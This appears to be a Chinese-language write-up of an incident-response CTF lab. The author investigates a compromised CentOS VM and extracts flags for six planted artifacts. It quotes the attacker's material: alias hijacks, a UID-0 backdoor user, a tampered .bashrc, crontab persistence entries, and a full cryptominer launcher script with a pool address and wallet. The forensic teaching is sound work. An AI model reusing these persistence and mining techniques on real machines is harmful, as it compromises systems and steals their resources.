下载附件中的 VM,导入到 VM 中,可以登录进去查看一下 IP 地址。
我是通过远程 SSH 连上去的。
# 题目 1
1. 找出被黑客修改的系统别名,并将倒数第二个别名作为 Flag 值提交;
-bash-4.2# alias | |
... | |
alias userdel='printf ""' | |
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde' |
倒数第二个是 userdel
flag: flag{userdel}
# 题目 2
找出系统中被植入的后门用户删除掉,并将后门用户的账号作为 Flag 值提交(多个用户名之间以英文逗号分割,如:admin,root);
-bash-4.2# cat /etc/passwd | |
... | |
admin:x:1000:1000::/home/admin:/bin/bash | |
sclipicibosu:x:0:0::/home/sclipicibosu:/bin/bash |
sclipicibosu 用户不正常的
flag: flag{sclipicibosu}
# 题目 3
找出黑客在 admin 用户家目录中添加的 ssh 后门,将后门的写入时间作为 Flag 值(提交的时间格式为:2022-01-12 08:08:18)
-bash-4.2# ls -l --time-style=+"%Y-%m-%d %H:%M:%S" /home/admin/.ssh/authorized_keys | |
-rw-------. 1 admin admin 380 2022-09-14 15:04:47 /home/admin/.ssh/authorized_keys |
flag: flag{2022-09-14 15:04:47}
# 题目 4
找出黑客篡改过的环境变量文件,将文件的 md5 值作为 Flag 值提交;
-bash-4.2# cat ~/.bashrc | |
# .bashrc | |
source /var/tmp/.SQL-Unix/.SQL/.db | |
alias rm=rm -i | |
alias cp=cp -i | |
alias mv=mv -i | |
echo Uname: Linux admin-virtual-machine 5.4.0-54-generic #60-CentOS SMP Fri Nov 6 10:37:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux |
看到是不正常的
-bash-4.2# md5sum ~/.bashrc | |
d847ea4b317c880c3854418503d11470 /root/.bashrc |
flag: flag{d847ea4b317c880c3854418503d11470}
# 题目 5
找出黑客修改了 bin 目录下的某个文件,将该文件的格式作为 Flag 值提交
直接找到 bin 下最后修改的文件
-bash-4.2# ls -ltr /usr/bin/ | tail -n 10 | |
lrwxrwxrwx. 1 root root 18 9月 13 2022 scsi-rescan -> rescan-scsi-bus.sh | |
lrwxrwxrwx. 1 root root 6 9月 13 2022 bzcmp -> bzdiff | |
lrwxrwxrwx. 1 root root 5 9月 13 2022 bzcat -> bzip2 | |
lrwxrwxrwx. 1 root root 5 9月 13 2022 bunzip2 -> bzip2 | |
lrwxrwxrwx. 1 root root 6 9月 13 2022 bzless -> bzmore | |
lrwxrwxrwx. 1 root root 6 9月 13 2022 pstree.x11 -> pstree | |
lrwxrwxrwx. 1 root root 10 9月 13 2022 traceroute6 -> traceroute | |
lrwxrwxrwx. 1 root root 8 9月 13 2022 mac2unix -> dos2unix | |
lrwxrwxrwx. 1 root root 8 9月 13 2022 unix2mac -> unix2dos | |
-rwxrwxrwx. 1 root root 305 9月 15 2022 sshd | |
-bash-4.2# file sshd | |
sshd: ASCII text |
flag: flag{ASCII text}
# 题目 6
找出黑客植入系统中的挖矿病毒,将矿池的钱包地址作为 Flag 值(提交格式为:0xa1d1fadd4fa30987b7fe4f8721b022f4b4ffc9f8)提交
-bash-4.2# unalias crontab | |
-bash-4.2# crontab -l | |
# DO NOT EDIT THIS FILE - edit the master and reinstall. | |
# (/home/zyr/.5p4rk3l5 installed on Thu Feb 17 10:29:11 2022) | |
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) | |
@daily /home/admin/./.b4nd1d0 | |
@reboot /home/admin/./.placi > /dev/null 2>&1 & disown | |
* * * * * /home/admin/./.placi > /dev/null 2>&1 & disown | |
@monthly /home/admin/./.placi > /dev/null 2>&1 & disown |
-bash-4.2# cat /home/admin/./.b4nd1d0 | |
#!/bin/bash | |
m1lbe1() | |
{ | |
if ! pgrep -x ethminer >/dev/null | |
then | |
cd /home/admin/bin | |
./ethminer -P stratum1+tcp://0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.ethminer:[email protected]@eth-asia1.nanopool.org:9999 --report-hashrate >/dev/null 2>&1 & disown $* | |
else | |
exit; | |
fi | |
} | |
m1lbe1 |
看到地址了
flag: flag{0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8}
